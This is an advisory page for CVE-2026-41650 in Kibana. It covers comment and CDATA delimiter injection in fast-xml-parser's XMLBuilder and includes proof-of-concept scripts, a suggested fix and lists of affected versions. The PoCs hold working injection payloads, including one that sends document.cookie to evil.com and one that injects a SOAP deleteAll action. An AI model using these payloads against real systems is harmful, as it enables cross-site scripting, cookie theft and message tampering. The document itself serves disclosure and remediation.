kibana - CVE-2026-41650

Severity

MEDIUM

Description

# fast-xml-parser XMLBuilder: Comment and CDATA Injection via Unescaped Delimiters

## Summary

fast-xml-parser XMLBuilder does not escape the `-->` sequence in comment content or the `]]>` sequence in CDATA sections when building XML from JavaScript objects. This allows XML injection when user-controlled data flows into comments or CDATA elements, leading to XSS, SOAP injection, or data manipulation.

Existing CVEs for fast-xml-parser cover different issues:

- CVE-2023-26920: Prototype pollution (parser)
- CVE-2023-34104: ReDoS (parser)
- CVE-2026-27942: Stack overflow in XMLBuilder with preserveOrder
- CVE-2026-25896: Entity encoding bypass via regex in DOCTYPE entities

This finding covers **unescaped comment/CDATA delimiters in XMLBuilder** - a distinct vulnerability.

## Vulnerable Code

**File**: `src/fxb.js`

```javascript
// Line 442 - Comment building with NO escaping of -->
buildTextValNode(val, key, attrStr, level) {
  // ...
  if (key === this.options.commentPropName) {
    return this.indentate(level) + `<!--${val}-->` + this.newLine; // VULNERABLE
  }
  // ...
  if (key === this.options.cdataPropName) {
    return this.indentate(level) + `<![CDATA[${val}]]>` + this.newLine; // VULNERABLE
  }
}
```

Compare with attribute/text escaping, which IS properly handled via `replaceEntitiesValue()`.

## Proof of Concept

### Test 1: Comment Injection (XSS in SVG/HTML context)

```javascript
import { XMLBuilder } from 'fast-xml-parser';

const builder = new XMLBuilder({
  commentPropName: "#comment",
  format: true,
  suppressEmptyNode: true
});

const xml = {
  root: {
    "#comment": "--><script>alert('XSS')</script><!--",
    data: "legitimate content"
  }
};

console.log(builder.build(xml));
```

**Output**:

```xml
<root>
  <!----><script>alert('XSS')</script><!---->
  <data>legitimate content</data>
</root>
```

### Test 2: CDATA Injection (RSS feed)

```javascript
import { XMLBuilder } from 'fast-xml-parser';

const builder = new XMLBuilder({
  cdataPropName: "#cdata",
  format: true,
  suppressEmptyNode: true
});

const rss = {
  rss: {
    channel: {
      item: {
        title: "Article",
        description: {
          "#cdata": "Content]]><script>fetch('https://evil.com/'+document.cookie)</script><![CDATA[more"
        }
      }
    }
  }
};

console.log(builder.build(rss));
```

**Output**:

```xml
<rss>
  <channel>
    <item>
      <title>Article</title>
      <description>
        <![CDATA[Content]]><script>fetch('https://evil.com/'+document.cookie)</script><![CDATA[more]]>
      </description>
    </item>
  </channel>
</rss>
```

### Test 3: SOAP Message Injection

```javascript
import { XMLBuilder } from 'fast-xml-parser';

const builder = new XMLBuilder({
  commentPropName: "#comment",
  format: true
});

const soap = {
  "soap:Envelope": {
    "soap:Body": {
      "#comment": "Request from user: --><soap:Body><Action>deleteAll</Action></soap:Body><!--",
      Action: "getBalance",
      UserId: "12345"
    }
  }
};

console.log(builder.build(soap));
```

**Output**:

```xml
<soap:Envelope>
  <soap:Body>
    <!--Request from user: --><soap:Body><Action>deleteAll</Action></soap:Body><!---->
    <Action>getBalance</Action>
    <UserId>12345</UserId>
  </soap:Body>
</soap:Envelope>
```

The injected `<Action>deleteAll</Action>` appears as a real SOAP action element.

## Tested Output

All tests run on Node.js v22, fast-xml-parser v5.5.12:

```
1. COMMENT INJECTION:
   Injection successful: true
2. CDATA INJECTION (RSS feed scenario):
   Injection successful: true
4. Round-trip test:
   Injection present: true
5. SOAP MESSAGE INJECTION:
   Contains injected Action: true
```

## Impact

An attacker who controls data that flows into XML comments or CDATA sections via XMLBuilder can:

1. **XSS**: Inject `<script>` tags into XML/SVG/HTML documents served to browsers
2. **SOAP injection**: Modify SOAP message structure by injecting XML elements
3. **RSS/Atom feed poisoning**: Inject scripts into RSS feed items via CDATA breakout
4. **XML document manipulation**: Break XML structure by escaping comment/CDATA context

This is practically exploitable whenever applications use XMLBuilder to generate XML from data that includes user-controlled content in comments or CDATA (e.g., RSS feeds, SOAP services, SVG generation, config files).

## Suggested Fix

Escape delimiters in comment and CDATA content:

```javascript
// For comments: replace -- with escaped equivalent
if (key === this.options.commentPropName) {
  const safeVal = String(val).replace(/--/g, '&#45;&#45;');
  return this.indentate(level) + `<!--${safeVal}-->` + this.newLine;
}

// For CDATA: split on ]]> and rejoin with separate CDATA sections
if (key === this.options.cdataPropName) {
  const safeVal = String(val).replace(/]]>/g, ']]]]><![CDATA[>');
  return this.indentate(level) + `<![CDATA[${safeVal}]]>` + this.newLine;
}
```

CVSS Scores

Affected Versions

  • 9.4.0
  • 9.3.4
  • 9.3.3
  • 9.3.2
  • 9.3.1
  • 9.3.0
  • 9.2.8
  • 9.2.7
  • 9.2.6
  • 9.2.5
  • 9.2.4
  • 9.2.3
  • 9.2.2
  • 9.2.1
  • 9.2.0
  • 9.1.10
  • 9.1.9
  • 9.1.8
  • 9.1.7
  • 9.1.6
  • 9.1.5
  • 9.1.4
  • 9.1.3
  • 9.1.2
  • 9.1.1
  • 9.1.0
  • 9.0.8
  • 9.0.7
  • 9.0.6
  • 9.0.5
  • 9.0.4
  • 9.0.3
  • 9.0.2
  • 9.0.1
  • 9.0.0
  • 8.19.15
  • 8.19.14
  • 8.19.13
  • 8.19.12
  • 8.19.11
  • 8.19.10
  • 8.19.9
  • 8.19.8
  • 8.19.7
  • 8.19.6
  • 8.19.5
  • 8.19.4
  • 8.19.3
  • 8.19.2
  • 8.19.1
  • 8.19.0
  • 8.18.8
  • 8.18.7
  • 8.18.6
  • 8.18.5
  • 8.18.4
  • 8.18.3
  • 8.18.2
  • 8.18.1
  • 8.18.0
  • 8.17.10
  • 8.17.9
  • 8.17.8
  • 8.17.7
  • 8.17.6
  • 8.17.5
  • 8.17.4
  • 8.17.3
  • 8.17.2
  • 8.17.1
  • 8.17.0

Not Affected Versions

  • 8.16.6
  • 8.16.5
  • 8.16.4
  • 8.16.3
  • 8.16.2
  • 8.16.1
  • 8.16.0
  • 8.15.5
  • 8.15.4
  • 8.15.3
  • 8.15.2
  • 8.15.1
  • 8.15.0
  • 8.14.3
  • 8.14.2
  • 8.14.1
  • 8.14.0
  • 8.13.4
  • 8.13.3
  • 8.13.2
  • 8.13.1
  • 8.13.0
  • 8.12.2
  • 8.12.1
  • 8.12.0
  • 8.11.4
  • 8.11.3
  • 8.11.2
  • 8.11.1
  • 8.11.0
  • 8.10.4
  • 8.10.3
  • 8.10.2
  • 8.10.1
  • 8.9.2
  • 8.9.1
  • 8.9.0
  • 8.8.2
  • 8.8.1
  • 8.8.0
  • 8.7.1
  • 8.7.0
  • 8.6.2
  • 8.6.1
  • 8.6.0
  • 8.5.3
  • 8.5.2
  • 8.5.1
  • 8.5.0
  • 8.4.3
  • 8.4.2
  • 8.4.1
  • 8.4.0
  • 8.3.3
  • 8.3.2
  • 8.3.1
  • 8.3.0
  • 8.2.3
  • 8.2.2
  • 8.2.1
  • 8.2.0
  • 8.1.3
  • 8.1.2
  • 8.1.1
  • 8.1.0
  • 8.0.1
  • 8.0.0